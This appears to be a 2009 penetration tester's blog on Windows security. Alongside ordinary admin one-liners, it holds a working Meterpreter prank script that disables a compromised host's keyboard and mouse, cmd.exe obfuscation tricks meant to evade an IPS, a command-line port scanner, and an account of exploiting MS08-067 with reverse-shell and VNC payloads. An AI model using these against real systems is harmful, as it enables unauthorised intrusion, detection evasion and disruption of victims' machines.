.\Get-LastLogin.ps1 | where {$_.LastLogin -lt (Get-Date).AddDays(-90)} | | Sort-Object @{expression="LastLogin";Descending=$true},@{expression="User";Ascending=$true} | Export-Csv "c:\lastloginreport.csv" -noTypeInformation

Make Windows more secure, use a blank password

Tim Medin — Sun, 17 May 2009 03:24:00 GMT

Today I was attacking and pillaging a test windows machine from a linux box. Many windows machines are setup with a blank administrator password since people just hit the enter key when they are prompted for a password. I was testing to see what happens on these machines with this configuration. I also created another account with a blank password.

Using either of these accounts I was able to connect to manually created shares, but not to the admin shares (c$, d$, admin$). Beginning with Windows XP Home edition and later non-server editions of Windows, Windows implements the "ForceGuest" feature when the local Administrator account has a blank password. When a remote user authenticates to Windows XP (and later) as Administrator with a blank password (e.g. by mapping to one of the administrative shares), Windows will assign to their session a Guest access token, not an Administrator access token thereby preventing access to the entire C drive (a good thing).

These home users who have "picked" the blank password when forced to pick a real password would probably pick a password that is very easy to guess, such as "password", <username>, or some word in a monosyllabic dictionary. It is arguable more secure for these users to have no password than to pick one. No, neither of these options is good (both are dumb), but at least Microsoft prevents users from exceptionally reducing their security.

Yes, I understand the stupidity of the argument either way, this is meant to be a little touch-in-cheek.

If you are interested in the tools I was using here they are:
hydra
nbtscan
rpcclient - link1 link2
smbclient

www.microsoft.com and hosts file wierdness. Why?

Tim Medin — Wed, 01 Apr 2009 19:30:29 GMT

From a Windows XP SP3 machine with all patches I ping www.microsoft.com and
it hits 65.55.21.250

I then add the following line to my hosts file
127.0.0.1 www.microsoft.com

I flush dns
ipconfig /flushdns

I then ping www.microsoft.com and it still resolves to 65.55.21.250

Why?

Rickroll Meterpreter Script

Tim Medin — Tue, 31 Mar 2009 04:52:00 GMT

In order to be well prepared for April Fools day I decided to put out a rickroll meterpreter script.

It defaults to looking for rickroll.mp3 in the metasploit framework root directory, but you can use another file with the -f option. I don't parse out the name so you will have to copy it into the metasploit directory.

You can also use any file format supported by windows media player so you can have it play a wmv (even better). By default the process is hidden, but you can make it visible with a -v option.

New Features!
And just for added fun, throw in a -k to disable the keyboard or -m to disable the mouse or you can go all in by using the -e to disable the mouse and keyboard and save precious keystrokes.

Here is the file:
rickroll.tar

Put it in framework3/meterpreter/scripts

#
# Provided by Tim Medin at timmedin[at]gmail [dot] com
#
# Uploads the rick roll'ing mp3 and then runs it as a hidden process
# You can also upload a different file (like a wmv video) and have it display -v
#
# Known Issues: I don't parse the file name provided by -f so make
#   sure the file is in the framework's root directory
#
# Added disable keyboard and mouse features
#
# *** Thanks for help from dark operator (Carlos Perez) ***
#
def message
        print_status "Rickroll'ing Meterpreter Script"
end
def usage
        print(
        "Windows Rickroll Meterpreter Script\n" +
        "Usage: rickroll [-h] [-k] [-m] [-e] [-v] \[-f <filename>\]\n" +
        @@exec_opts.usage
        )
end

@@exec_opts = Rex:arser::Arguments.new(
"-h" => [ false, "Help menu."],
"-f" => [ false, "File to upload"],
"-k" => [ false, "Disable Keyboard"],
"-m" => [ false, "Disable Mouse"],
"-e" => [ false, "Disable Keyboard & Mouse"],
"-v" => [ false, "Visible"]
)

rick = "rickroll.mp3"
mediaplayer = "\"C:\\Program Files\\Windows Media Player\\wmplayer.exe\""
visible = false
keyboard = true
mouse = true

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
                when "-k"
                        keyboard = false
                when "-m"
                        mouse = false
                when "-e"
                        keyboard = false
                        mouse = false
                when "-v"
                        visible = true
                when "-f"
                        rick = val
                when "-h"
                        usage
                        abort
                        break
                end
}

session = client

#upload file
print_status("Uploading file #{rick}")
uploadpath = session.fs.file.expand_path("%temp%") + "\\#{rand(100)}.mp3"
client.fs.file.upload_file(uploadpath, rick)
print_status("Uploaded file to #{uploadpath}")

if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
        go = false
        process2mig = "explorer.exe"
        session.sys.process.get_processes().each do |x|
        if (process2mig.index(x['name'].downcase))
                print_status("\t#{process2mig} Process found, migrating..")
                session.core.migrate(x['pid'].to_i)
                print_status("Migration Successful!!")
                go = true
                end
        end
else
        go = true
end

if (go)
        if (!mouse)
                print_status("Disabling mouse to extend the pain!")
                session.ui.disable_mouse
        end
        if (!keyboard)
                print_status("Disabling keyboard to extend the pain!")
                session.ui.disable_keyboard
        end
        print_status("Rick rolling!")
        client.sys.process.execute("#{mediaplayer} \"#{uploadpath}\"", nil, {'Hidden' => !visible})
else
        print_status("Need logged in user to execute, cannot find explorer.exe to migrate")
end

Patch Audit using Windows Command Line

Tim Medin — Fri, 27 Mar 2009 16:35:00 GMT

Get a report of the patch for ms08-067

for /f "delims=\ " %i in ('net view ^| findstr "\\"') do @echo %i >> patch.txt & @wmic /node:%i qfe where hotfixid="KB958644" list full 2>&1 | findstr "InstalledOn Description Instance" >> c:\patch.txt

Let's start in the slightly in middle and work outwards. The net view command gets a list of computers in your domain. The output contains some header and footer junk that we don't want, so we use the findstr command to just get a list of the computers. The output of just net view | findstr "\\" looks like this

\\computer1    Description1
\\computer2    Description2
\\computer3    Description3

In order to run the command inside the for loop we have to put singe quotes around it. The problem is that pesky pipe messes things up, so we have to delimit it with a carrot.

We just want the computer name, so we have to parse it with a for loop. We set the delimiters to be the backslash and a space. By default the for loop only returns the first token, in our case the computer name. We could explictly select the first token by adding "tokens=1", but brievity is what we want. So now we have a variable %i that contains just the computer name. If we just run the first portion we get this.

for /f "delims=\ " %i in ('net view ^| findstr "\\"') do @echo %i
computer1
computer2
computer3

So we now have a list of all computers in our domain. Now we want to see if they have the patch. Using Ed Skoudis's command line kung fu we can use that to generate a report from all the computers. You can check out the clkf blog for a good description of the the wmic command. http://blog.commandlinekungfu.com/2009/03/episode-16-got-that-patch.html

We then use &2>1 so send the error to standard out. This is done so we can filter on it and we can save it to our file. This way we can get a list of the computers that we can't contact and use that to find out another way. The options from the wmic command look like this.

c:\>wmic /node:%i qfe where hotfixid="KB958644" list full

Output options:
From a computer we can query:
Caption=
CSName=Computer1
Description=Security Update for Windows Server 2003 (KB958644)
FixComments=Update
HotFixID=KB958644
InstallDate=
InstalledBy=jholmbo
InstalledOn=10/28/2008
Name=
ServicePackInEffect=SP3
Status=

From a computer we can't query:
Node - Computer2
ERROR:
Code = 0x800706ba
Description = The RPC server is unavailable.
Facility = Win32

From an unpatche computer
No Instance(s) Available.

Finally, we use the findstr to take the relevant output and append it to our report. We could filter the resultes from the wmic query by using wmic qfe where hotfixid="KB958644" get InstalledOn but it splits the results into two lines, makes it harder to use findstr, and we are already using findstr so who cares.

We get a report that looks like this

computer1
InstalledOn=10/28/2008
computer2
Description = The RPC server is unavailable.
computer3
No Instance(s) Available.

Hope you guys find this useful!

Automating Authentication Providers in IIS with Command Line Kung Fu

Tim Medin — Wed, 25 Mar 2009 14:50:55 GMT

I have a few servers with numerous sites and I got tired of manually checking each site to see if it is using Kerberos or NTLM. I had to look up the site ID and then run

cscript adsutil.vbs get w3svc/<ID>/NTAuthenticationProviders

I figured there had to be a better way since this was getting tiring,
especially since the IDs are goofy numbers. I decided to try to automate it
and I came up with this script.

for /F "tokens=2 delims=/][" %i in ('cscript adsutil.vbs enum w3svc /P ^| findstr [0-9][0-9]') do @echo %i && @cscript adsutil.vbs get w3svc/%i/NTAuthenticationProviders | findstr NTAuthenticationProviders

Lets break it down into its bits.

The script runs csript adsutil.vbs enum w3svc /P which enumerates the sites and gives us this output:

[/w3svc/1]
[/w3svc/1108215390]
....
[/w3svc/729050872]
[/w3svc/AppPools]
[/w3svc/Filters]
[/w3svc/Info]

We don't care about the last three items so we use findstr to only give us results with two numbers, we can't just look for one number since it would match on w3svc.

The surrounding For loop will break up the output using the delimiters ], [, and / which will give us two tokens (ws3svc and the site id). The tokens=2 options gives us access to just the site id (the second token) in our loop. The portion after 'do' is pretty straight forward and echos the site id and then runs the command to get the authentication providers. We use the findstr again to get rid of all the junk we don't need.

We can also use a similar script to enable Kerberos:

for /F "tokens=2 delims=/][" %i in ('cscript adsutil.vbs enum w3svc /P ^| findstr [0-9][0-9][0-9]*') do @echo %i && @cscript adsutil.vbs set w3svc/%i/NTAuthenticationProviders "Negotiate,NTLM"

Windows Command Line Obfuscation

Tim Medin — Sat, 28 Feb 2009 19:12:00 GMT

The " and ^ characters can be used to on the windows command line to obfuscate commands. The " character only works when calling executables.

cmd.exe = c"m"d"."e"x"e = cm"d.exe = c^m^d.e^x^e = cm^d.exe = = c"m^d.exe = ....

dir = d^ir = ^d^i^r = di^r

This does not work

dir != d"ir

Now to figure out what to do with it. I am curious if this will work with command injection in windows.

I'd like to see how this works against an IPS that would normally act on cmd.exe in a query string and if it would even work on the server. Specifially, I am wondering how this will work against the windows 2000 unicode exploit with an obfuscated call do cmd.exe and dir. Looks like I need to set up a box and test.

Hopefully someone smarter than I can figure out a good way to use this.

FTP Port Scanning

Tim Medin — Sat, 28 Feb 2009 19:10:52 GMT

Ed Skoudis, the creator of SANS 560 and cofounder of Inguardians has had some fantastic ideas regarding "command line ninjitsu." He came up with a way to do a port scan from the windows command line without additional tools. Here is his command:

for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Since the windows ftp client does not allow a custom port from the command line it requires that you create a script file. Ed's example creates a ftp.txt file containing text similar to this:

open 1.2.3.4 3
quit

The ftp client will use this script file by passing the file with the -s switch. The output is written to ports.txt with an output similar to this:

Checking Port 1:
> ftp: connect: Unknown error number
Checking Port 2:
> ftp: connect: Unknown error number
Checking Port 3:
> Connection closed by remote host
Checking Port 4:
> ftp: connect: Unknown error number

By looking at the above test you can see that port 3 is open on the remote host.

I took Ed's command and made a slight change to it so the -s switch and ftp.txt are not needed.

for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & ((echo open 10.10.10.10 %i)&(echo quit)) | ftp 2>>ports.txt

The output is essentially the same just without the additional file.

If you don't want to write anything to disk you can do this:

for /L %i in (1,1,1024) do @((echo open 10.10.10.10 %i)&(echo quit)) | ftp 2>&1 | find "host" && @echo %i is open

Output:
Connection closed by remote host.
22 is open
Connection closed by remote host.
80 is open

WinXP Embedded and MS08-067

Tim Medin — Tue, 24 Feb 2009 02:55:40 GMT

I ran a rather routine Nessus scan of a network and noticed in the report that one of the devices was flagged as being vulnerable to MS08-067. Upon closer inspection I found out that this was an embedded device (sorry, not providing specifics on what it was). I thought it was rather interesting so I decided to use MetaSploit to confirm.

After starting msfconsole I selected the ms08-067 exploit (windows/smb/ms08_067_netapi) with the meterpreter payload (windows/meterpreter/reverse_tcp) and sure enough I could pop the box. All the meterpreter commands I ran worked just like an XP box. I could have run anything I wanted, such as a keylogger to capture credentials.

I tried the VNC payload (windows/vncinject/bind_tcp) and sent the exploit again. After a few seconds I had a view of the desktop. Lots of nice information would be there.

As a test I tried to write a file to the file system and then rebooted the box. When it came back up and I exploited the box again the file was gone. The "no write" option prevented my attack from persisting, but it didn't stop it from happening. How often does an embedded device get rebooted anyhow? Once it was popped it would probably only be booted during a power failure and for all intents and purposes could be considered persistent.

All I have left to do is figure out how to patch it.

Is Information Security for you?

Tim Medin — Wed, 18 Feb 2009 21:24:48 GMT

A great blog post with good input for the "wannabes"

So, You Wanna Be in InfoSec?
http://stateofsecurity.com/?p=588

IRS to get pwnd, good thing there is nothing important there

Tim Medin — Tue, 27 Jan 2009 01:06:00 GMT

So when do we get PCI for the govt?

The Government Accountability Office reported Friday that the tax-collecting arm of the U.S. government had addressed fewer than half of the 115 security holes the oversight agency previously cited.
http://www.washingtonpost.com/wp-dyn/content/article/2009/01/15/AR2009011500955.html

Hospital Infected

Tim Medin — Tue, 27 Jan 2009 00:54:00 GMT

There are so many issues at this hospital!

If patches were applied "a few weeks" after it was released, then how does a three month old security whole get exploited by the worm?
Surgery computers set to automatically reboot - why would any computer touching a patient be allowed to do that?
Networked computers in surgery?
Seriously, who decides to stop patching?

http://www.theregister.co.uk/2009/01/20/sheffield_conficker/